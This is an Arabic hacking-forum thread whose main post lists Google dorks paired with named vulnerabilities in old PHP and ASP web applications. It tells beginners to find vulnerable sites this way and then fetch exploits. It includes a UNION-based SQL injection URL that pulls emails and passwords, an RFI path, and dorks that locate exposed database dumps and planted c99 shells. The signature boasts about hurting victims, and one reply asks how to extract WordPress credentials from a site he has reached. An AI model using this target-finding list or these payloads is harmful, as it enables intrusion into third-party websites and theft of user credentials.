شرح اهم السكربتات مع الثغرات والدوركات

شرح اهم السكربتات مع الثغرات والدوركات


النتائج 1 إلى 6 من 6

الموضوع: شرح اهم السكربتات مع الثغرات والدوركات

  1. #1

    افتراضي شرح اهم السكربتات مع الثغرات والدوركات

    بسم الله الرحمن الرحيم


    موضوعنا لليوم هو شرح اهم السكربتات مع الثغرات والدوركات



    توضيح مفيد للمبتدئين
    الشرح
    خود الدروك وروح على
    WWW.GOOGLE.COM
    وسوي بحث
    ...

    بعدين خترلك موقع مصاب
    وروح على مواقع السيكرتي
    والباقي عليك

    Dork: inurl:"/chat/phpMyChat.php3"
    Link: phpMyChat v0.14.5 Multiple Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: "powered by talkback"
    Author: civi
    Link: TalkBack 2.2.7 Remote File Include Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Total members:" AND "Paid out:" AND "Redeemed:"
    Author: fuzion
    Link: Amber Script 1.0 (show_content.php id) Local File Inclusion Vulnerability
    --------------------------------------------------------------------------------
    Dork: inurl:Commence intitle:"Commence Conference System"
    Author: fuzion
    Link: IAPR COMMENCE 1.3 Multiple Remote File Inclusion Vulnerability
    --------------------------------------------------------------------------------
    Dork: inurl:"/hp/device/this.LCDispatcher"

    --------------------------------------------------------------------------------
    Dork: intitle:"Broadband Router Status"

    --------------------------------------------------------------------------------
    Dork: "Powered by SHP"
    Author: civi
    Link: Sciurus Hosting Panel Code Inject Exploit
    --------------------------------------------------------------------------------
    Dork: "Powered by icebb"
    Author: civi
    Link: IceBB 1.0-rc6 - Database Authentication Details Exploit
    --------------------------------------------------------------------------------
    Dork: "Powered by ExoPHPDesk v1.2.1"
    Link: ExoPHPDesk Index.PHP Multiple Input Validation Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: "Powered by GuppY"
    Link: GuppY Error.PHP Remote File Include and Command Execution Vulnerability
    --------------------------------------------------------------------------------
    Dork: "MySQL Administrator dump" filetype:sql

    --------------------------------------------------------------------------------
    Dork: intitle:"Helios Calendar Event Management System"
    Author: Maximiliano Soler
    Link: Helios Calendar <=1.2.1 Beta (XSS) Multiple Remote Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:Powered by UebiMiau! intitle:uebimiau inurl:/webmail/index.php?lid=
    Author: Maximiliano Soler
    Link: UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by MailBee WebMail"
    Author: Maximiliano Soler
    Link: MailBee WebMail Pro <=3.4 (XSS) Multiple Remote Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by SocketKB version"
    Author: Maximiliano Soler
    Link: SocketKB <=1.1.5 (XSS) Multiple Remote Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:"/info.php?reason=link" intitle:"BlaB!"
    Author: Maximiliano Soler
    Link: BlaB! Chat < 3.3 (XSS) Multiple Remote Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:"setup-config.php" intitle:"WordPress * Setup"

    --------------------------------------------------------------------------------
    Dork: intitle:"Micro Login System" inurl:login.php
    Link: Micro Login System v1.0 Password Disclosure
    --------------------------------------------------------------------------------
    Dork: inurl:"efileman.cgi"
    Link: eFileman Remote File Upload Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"MySQL-Dump" "Host: localhost" filetype:sql

    --------------------------------------------------------------------------------
    Dork: in****:"PostgreSQL database dump" filetype:sql

    --------------------------------------------------------------------------------
    Dork: in****:"phpBB Backup Script" filetype:sql

    --------------------------------------------------------------------------------
    Dork: in****:"phpMyAdmin MySQL-Dump" filetype:sql

    --------------------------------------------------------------------------------
    Dork: "Powered by ReloadCMS 1.2.5"
    Link: ReloadCMS Index.PHP Local File Include Vulnerability
    --------------------------------------------------------------------------------
    Dork: intitle:"Index of" in****:"LiteSpeed Web Server at"
    Link: LiteSpeed Remote Mime Type Injection
    --------------------------------------------------------------------------------
    Dork: intitle:"SiteBar" inurl:command
    Link: SiteBar Command.PHP Cross-Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by rnote" inurl:"rnote.php"
    Link: rNote rnote.PHP Multiple Cross Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: CMS von artmedic webdesign
    Author: iNs
    Link: artmedic CMS Local File Inclusion
    --------------------------------------------------------------------------------
    Dork: com_wmtrssreader
    Author: civi
    Link: wmtrssreader joomla component 1.0 Remote File Include Vulnerability
    --------------------------------------------------------------------------------
    Dork: com_swmenufree
    Author: civi
    Link: Joomla! swMenuFree 4.6 Component Remote File Include
    --------------------------------------------------------------------------------
    Dork: com_mambocredits
    Author: civi
    Link: com_mambocredits Remote File Incluison
    --------------------------------------------------------------------------------
    Dork: "Powered by Tikiwiki"
    Author: civi
    Link: TikiWiki 1.9.8 Remote PHP Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by lightblog"
    Author: civi
    Link: LightBlog 8.4.1.1 Remote Code Execution Exploit
    --------------------------------------------------------------------------------
    Dork: "Powered by Cart32" inurl:cart32.exe -Demo
    Link: Cart32 GetImage Arbitrary File Download Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by DRBGuestbook"
    Link: DRBGuestbook Remote XSS Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by actsite"
    Author: civi
    Link: actSite v1.991 Beta (base.php) Remote File Inclusion
    --------------------------------------------------------------------------------
    Dork: "Powered by MDPro"
    Link: MDPro 1.0.76 Remote SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: "Powered by mxBB"
    Link: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
    --------------------------------------------------------------------------------
    Dork:
    1) "Powered by phpBB" inurl:"faq.php?mode=openid"
    2) "Powered by phpBB" openid
    Author: salentinohack
    Link: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln
    --------------------------------------------------------------------------------
    Dork: "integramod nederland(s)"
    Author: civi
    Link: IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by ActiveKB Knowledgebase Software"
    Author: salentinohack
    Link: ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork:
    1) "Powered by Nuke-Evolution" intitle:NukeSentinel
    2) inurl:/modules.php?name=NukeSentinel
    Link: NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork:
    1) "Powered by Xcms"
    2) inurl:"/index.php?lng=it" "Amministrazione sito"
    Link: XCMS Arbitrary Command Execution Vuln
    --------------------------------------------------------------------------------
    Dork: "Powered by phpBB XS" inurlrofile.php
    Link: phpBB XS Profile.PHP HTML Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by SimplePHPBlog"
    Link: SimplePHPBlog img_upload_cgi.php Arbitrary File Upload Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by PhpWebGallery" inurlicture.php
    Link: PhpWebGallery Picture.PHP HTML Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by Phormer"
    Link: Phormer Index.PHP Multiple Cross-Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork:
    1) "Powered by iziContents"
    Author: civi
    Link: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities
    --------------------------------------------------------------------------------
    Dork:
    1) "Powered by phpBB2 Plus"
    2) inurl:"/phpBBplus/*.php" filetypehp
    Link: phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln
    --------------------------------------------------------------------------------
    Dork:
    1) intitle:"styles demo" "Powered by phpBB"
    2) inurl:/styles_demo/index.php
    Link: StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites
    --------------------------------------------------------------------------------
    Dork: in****:"R?is?vec KwsPHP"
    Link: KwsPHP version 1.0 suffers from a remote SQL injection vulnerability the stats module.
    --------------------------------------------------------------------------------
    Dork: inurl:"/jblog/index.php"
    Link: JBlog 1.0 (index.php id) Remote SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: inurl:"/webquest/soporte_derecha_w.php"
    Link: PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: "Powered by GForge"
    Link: GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by TinyWebGallery"
    Link: TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dorks: inurl:"/customer/product.php?" X-cart
    Author: hip
    Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:/xcart/home.php
    Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities
    --------------------------------------------------------------------------------
    Dorks:
    1) "Powered by phpmytourney"
    2) inurlhpmytourney
    3) inurl_signup.php
    Author: civi
    Link: phpMytourney (functions_file) Remote File Inclusion Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"anyInventory 1.9" intitle:anyInventory
    Link: AnyInventory => 1.9.1 Remote file inclusion
    --------------------------------------------------------------------------------
    Dork: intitle:"Calendar: A JSP APPLICATION"
    Link: Apache Tomcat version 4.1.31 XSS Vuln.
    --------------------------------------------------------------------------------
    Dork: in****:" Powered by myBloggie"
    Link: MyBloggie Trackback.PHP Multiple SQL Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by Claroline * 2001"
    Link: Claroline Local File Include and Cross-Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: intitle:"Webboard Powered by : 212cafe.com"
    Link: 212cafe Webboard Read.PHP SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by Weblogicnet"
    Link: Weblogicnet (files_dir) Remote File Inclusion
    --------------------------------------------------------------------------------
    Dork: inurl:index.php?option=com_content intitle:"Joomla* powered Site"
    Link: Joomla! 1.5 Beta1/Beta2 SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: inurl:Tiki-Remind_Password.PHP
    Link: Tikiwiki Tiki-Remind_Password.PHP Cross-Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: inurl:category.php?manufacturer_id=
    Link: CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: inurl:/phpBB2/links.php OR inurl:/forum/links.php "Powered by phpBB"
    Link: phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by DeskPRO" "Login / Create" OR "Login to Your Account"
    Link: 1) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
    Link: 2) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: "ABC eStore * Zakkis Tech"
    Link: ABC estore 3.0 (cat_id) Blind SQL Injection
    --------------------------------------------------------------------------------
    Dork: "ABC eStore * Zakkis Tech"
    Link: ABC estore 3.0 (cat_id) Blind SQL Injection
    --------------------------------------------------------------------------------
    Dork: "Powered by xGB 2.0"
    Link: xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
    --------------------------------------------------------------------------------
    Dork: inurl:vwar/news.php
    Author: civi
    Link: VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion
    --------------------------------------------------------------------------------
    Dork: "Powered by 'SunShop Shopping Cart'"
    Link: SunShop v4.0 RC 6 (search) Blind SQL Injection
    --------------------------------------------------------------------------------
    Dork: in****:"propuls?ar SPIP"
    Link: SPIP Inc-Calcul.PHP3 Remote File Include Vulnerability
    --------------------------------------------------------------------------------
    Dork:
    1) "Powered by Olate Download" inurl:download.php
    2) intitle:"Olate Download - Error"
    Link: Olate Download Download.PHP Multiple SQL Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: "Powered by LiteCommerce: ecommerce software"
    Link: LiteCommerce Multiple SQL Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: intitle:"Powered By phUploader"
    Link: phUploader phUploader.PHP Arbitrary File Upload Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by Squirrelcart * PHP Shopping Cart Software"
    Link: Squirrelcart Popup_Window.PHP Remote File Include Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Dalai Forum v1*"
    Link: Dalai Forum Forumreply.PHP Local File Include Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by GetMyOwnArcade.com."
    Link: GetMyOwnArcade Search.PHP SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by EZPhotoSales" intitle:"Online Viewing"
    Link: EZPhotoSales Multiple Input Validation Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by Article Dashboard"
    Link: Article Dashboard Multiple Input Validation Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by DeskPRO" inurl: login.php
    Link: DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:"/go/_files/?file="
    Author: dun
    Link: SOTEeSKLEP Remote File Disclosure Vulnerability
    --------------------------------------------------------------------------------
    Dork:
    1) in****:"Created by phpSysInfo" inurl: index.php
    2) intitle:"System Information" in****:"Created by phpSysInfo"
    Link: phpSysInfo Index.php Cross-Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: inurl:"/detail.asp?iPro" in****:"Year: *. Date:"
    Link: AutoDealer Detail.ASP SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork:
    1) intitle:"- LinPHA" inurl:new_images.php
    2) in****:"Powered by LinPHA"
    Link: LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection
    --------------------------------------------------------------------------------
    Dork:
    1) in****:"Powered by Philboard" intitle:"Philboard"
    2) inurlhilboard_forum.asp -sql
    Link: Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql Injection
    --------------------------------------------------------------------------------
    Dork: intitle:xoops inurl:/modules/xfsection/
    Author: civi
    Link: XOOPS Module XFsection Remote File Inclusion
    --------------------------------------------------------------------------------
    Dork:
    1) in****:"Powered by Nukedit"
    2) "Powered by Nukedit" inurl:"login.asp"
    Link: Nukedit Login.ASP Cross-Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Built with FORMfields" inurl:/adMan/
    Link: FORMfield Secure Login.PHP Multiple Cross-Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: intitle:"The **** Ad Marketplace"
    Link: AlstraSoft **** Ads Enterprise Multiple Cross-Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"powered by philboard" -SQL
    Link: W1L3D4 Philboard v0.3 XSS Vulnerability
    --------------------------------------------------------------------------------
    Dork:
    1) in****:"Powered by Webspell"
    2) intitle:"webSPELL v4.0"
    Link: Webspell 4.x Local File Inclusion (Win)
    --------------------------------------------------------------------------------
    Dork: intitle:"Confixx Professional" in****:Login"
    Link: Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by UseBB"
    Link: UseBB version: 1.0.7 Cross Site Scripting (XSS)
    --------------------------------------------------------------------------------
    Dork:
    1) inurl:"us/index.php?option=com_remository
    2) intitle:"* ReMOSitory"
    Author: xdfsd45oi
    Link: Mambo Remository Component <= 3.25 Remote Include Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered By Vivvo CMS"
    Link: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: allinurl:bemarket
    Author: mozi
    RFI Exploit:
    /bemarket/postscript/postscript.php?p_mode=evilscipt
    --------------------------------------------------------------------------------
    Dork: intitle:"dig up the stats"
    Link: Traffic Stats SQL Injection Vulnerbility
    --------------------------------------------------------------------------------
    Dork:
    1) inurlafiledb.php?action=search
    2) in****:"Powered by paFileDB" intitleaFileDB
    Link: paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: allinurl:directory.php?ax=list
    Author: proxyakabran
    SQL Injection:
    /directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D**, email,0x3a,password),6,7,8,9,10,0x22****212D2D,12, 13/**/from/**/links/*
    --------------------------------------------------------------------------------
    Dork: intitle:"SiteScape Forum Login"
    Link: SiteScape Forum Multiple Unspecified Cross-Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:"mimic2.cgi"
    Link: Mimicboard2 Mimic2.Dat Unauthorized Access Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by Calendar Express 2"
    Link: Calendar Express Multiple SQL Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by Discus" inurl:/discus/
    Link: DiscusWare Discus Error Message Cross-Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by WebMatic" (only 99 results)
    Link: Webmatic Multiple SQL Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by MKPortal"
    Link: MkPortal Multiple SQL Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:mailmachine.cgi in****:"Mail Machine v3" (only 11 results)
    Link: Mail Machine Local File Include Exploit
    --------------------------------------------------------------------------------
    Dork: inurlictionary.aspx intitleictionary.aspx
    Link: HomestayFinder's Dictionary.aspx XSS vuln.
    --------------------------------------------------------------------------------
    Dork: ":80" ":8080" -in****:a* filetype:txt
    Author: florence
    Finds lists of proxies.
    --------------------------------------------------------------------------------
    Dork: intitle:"Aigaion * Please login" *(only 6 found)
    Link: Aigaion <= 1.3.3 SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: inurl:htmltonuke.php?
    Link: PHP-Nuke RFI Exploit
    --------------------------------------------------------------------------------
    Dork: "Powered by PHP Director" inurl:videos.php
    Link: PHP Director Videos.PHP SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: intitle:"phpwcms ** web based content management system"
    Link: PHPWCMS Multiple Remote File Include Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"powered by easybe." (only 6 results)
    Link: Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"phpBook Ver" inurl:guestbook.php intitle:"Guestbook"
    Link: NETonE PHPBook Guestbook.PHP Cross Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Login to Webmin" inurl:10000
    Link: Webmin Pam_Login.CGI Multiple Unspecified Cross-Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:"spellcheck****.php" OR inurl:"spellcheckwindow.php" (only 10 results)
    Link: SPHPell Multiple Remote File Include Vulnerabilities
    --------------------------------------------------------------------------------
    Dork:
    1) inurl:index.php?name=PNphpBB2 inurl:viewforum
    2) in****:"Powered by PNphpBB2"
    Link: PNphpBB2 "viewforum.php" SQL Injection Blind Password Hash Fishing Exploit
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by EQdkp" inurl:"login.php"
    Link: EQDKP Login.PHP Arbitrary Variable Overwrite Vulnerability
    --------------------------------------------------------------------------------
    Dork: "Powered by Wheatblog"
    Link: Wheatblog Login SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: intitle:"phpEventCalendar: Event Display"
    Link: phpEventCalendar <= v0.2.3 SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: inurl:forum.php "Powered by VBZooM"
    Link: vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: intitle:c99shell filetypehp

    --------------------------------------------------------------------------------
    Dork: intitle:"WebChat" inurl:"/webchat/login.php
    Link: WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"powered by e107" inurl:signup.php
    Link: E107 Signup.PHP Arbitrary File Upload Vulnerability
    --------------------------------------------------------------------------------
    Dork: intitle:"phpTrafficA ** web statistics"
    Link: phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: intitle:"Welcome to LMS" in****:"Please login"
    Link: LMS - LAN Management System 1.9.6 - RFI
    --------------------------------------------------------------------------------
    Dork: intitle:"Blackboard Academic Suite"
    Link: Blackboard Products Multiple HTML Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: intitle:"Blackboard Learning System" inurl:/login/
    Link: Blackboard Products Multiple HTML Injection Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by WMS-CMS" inurl:default.asp
    Link: WMSCMS Multiple Cross Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: inurl:/xmlrp.php in****:"Warning:" in****:"wp-config.php"
    Link: Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: in****:"Software PBLang" inurl:"login.php "intitle:log in"
    Link: PBLang <= 4.67.16.a Remote Code Execution Exploit
    --------------------------------------------------------------------------------
    Dork: in****:Powered by EQdkp inurl:listmembers.php
    Link: EQdkp <= 1.3.2 SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: intitle:sendcard - a PHP postcard script using a database to store the cards"
    Link: Sendcard <= 3.4.1 Remote Code Execution Exploit
    --------------------------------------------------------------------------------
    Dork: inurl:/cpCommerce/category.php
    Link: cpCommerce <= 1.1.0 (category.php id_category) Remote SQL Injection Exploit
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by Particle Gallery"
    Link: Particle Gallery Search.PHP Cross-Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Powered by Particle Blogger"
    Link: Particle Blogger Archives.PHP SQL Injection Vulnerability
    --------------------------------------------------------------------------------
    Dork: OTRS :: Login in****:"Powered by OTRS"
    Link: OTRS Index.PL Cross-Site Scripting Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:"Vistered Little Theme by"
    Link: Vistered Little 1.6a Remote File Disclosure Vulnerability
    --------------------------------------------------------------------------------
    Dork: in****:Powered by phpCodeur © 2002–2006 | Wanewsletter
    Link: WAnewsletter-2.1.3 (newsletter.php) RFI Vul
    --------------------------------------------------------------------------------
    Dork: intitlehpPgAdmin - Login
    Link: JavaScript code Injection in phpPgAdmin
    --------------------------------------------------------------------------------
    Dork: in****:SquirrelMail Login
    Link: SquirrelMail Multiple Cross Site Scripting Vulnerabilities
    --------------------------------------------------------------------------------
    Dork: in****:Powered by Geeklog inurl:album.php
    Link: Media Gallery =>v1.4 Remote file inclusion
    --------------------------------------------------------------------------------
    Dork: Powered By Pligg in****:Beta 9 / Login
    Link: Pligg Reset Forgotten Password Security Bypass Vulnerability
    --------------------------------------------------------------------------------
    Dork: mailto:*@aol.com
    Helps find usernames on a certain domain, replace aol.com
    --------------------------------------------------------------------------------
    Dork: in****:GNUTURK PORTAL inurl:Mods.PHP
    Link: GNUTurk Mods.PHP Cross Site Scripting Vulnerability


    ماتنسوش التقيم
    ازغل منكو
    قانون الهكر
    وراء كل ابتسامة هكر .. دمعة ضحيه

    نعشق الموت لكي لا تعشقنا الحياة فدخلنا مدارس الهكر لنعاقب الحقراء

    ... لا نعرف الرحمه ولا نرضى بالتهديد لك حرية التعبير ولي حرية التهكير

    "....... نحن لا نخترق لكي نثبت اننا محترفون بل نضع بصمة في تاريخك ....... "

  2. #2

    افتراضي رد: شرح اهم السكربتات مع الثغرات والدوركات

    مشكوووووور يابعدي بس الدوركات لأي ثغره ..؟؟


    سبحان الله وبحمده .. سبحان الله العظيم


    MSN : waleed.rooot@gmail.com

  3. #3

    افتراضي رد: شرح اهم السكربتات مع الثغرات والدوركات

    لو سمحتو ابي اعرف كيف اطلع اليوزر نيم والباسورد للسكربت Wordpress
    انا طلعت لوحة تحكم لاكن ما اعرف كيف اطلع اليوزر نيم والباسورد لاكن ساعدوني يا اخواني

  4. #4

    افتراضي رد: شرح اهم السكربتات مع الثغرات والدوركات

    allah ybarek fik

  5. #5

    افتراضي رد: شرح اهم السكربتات مع الثغرات والدوركات

    مشكووور اخي وبانتظار جديدك يا مبدع
    ..# من عرفتكَ وحآلتي صعيبه / سآقط في آلمدرسه ؛ وضآيع في ' حيآآتي ' #..

    ما اقول اني بطل ولا اقول اني .. ( مصيبه ) انا ( خفآش ) يالخبل .. عمري ماتمنيت شيء وماقدرت اجيبه

    لازم تذوق الذل وتعيش مكسور ,, هذا وعد مني مادمت انا حي

    تبآ للعآلم وتبآ للحمآيات ســوف ادمر بلآ تـوقف آمآ الموت او السجن

    يشهد لي قوقل اني بطل . . .
    [B]
    الكل هنا كبير و لكن لا تغرَك المظاهر انا لست سوى بمبنتدئ

  6. #6

    افتراضي رد: شرح اهم السكربتات مع الثغرات والدوركات

    m,erciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii iiiiiii

المواضيع المتشابهه

  1. شرح طريقة كشف السكربتات الملغومة((صور))
    بواسطة bachir66 في المنتدى منتدى حماية الأجهزة
    مشاركات: 15
    آخر مشاركة: 11-26-2011, 07:06 PM
  2. جبتلكم من السكربتات مايسر القلب
    بواسطة mashhur في المنتدى الماسنجر
    مشاركات: 16
    آخر مشاركة: 01-14-2011, 06:44 PM
  3. دورة Security War لاكتشاف الثغرات في السكربتات حصرياا, برعاية الاخ alnjm33
    بواسطة milworm في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 7
    آخر مشاركة: 08-29-2010, 02:44 AM
  4. تعاريف: الثغرات - السكربتات ؟
    بواسطة الشريف 515 في المنتدى منتدى الإختراق العام
    مشاركات: 1
    آخر مشاركة: 07-06-2010, 06:05 PM
  5. كيفية استخراج السكربتات
    بواسطة AleXandr في المنتدى منتدى إختراق المنتديات
    مشاركات: 0
    آخر مشاركة: 06-05-2010, 05:20 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •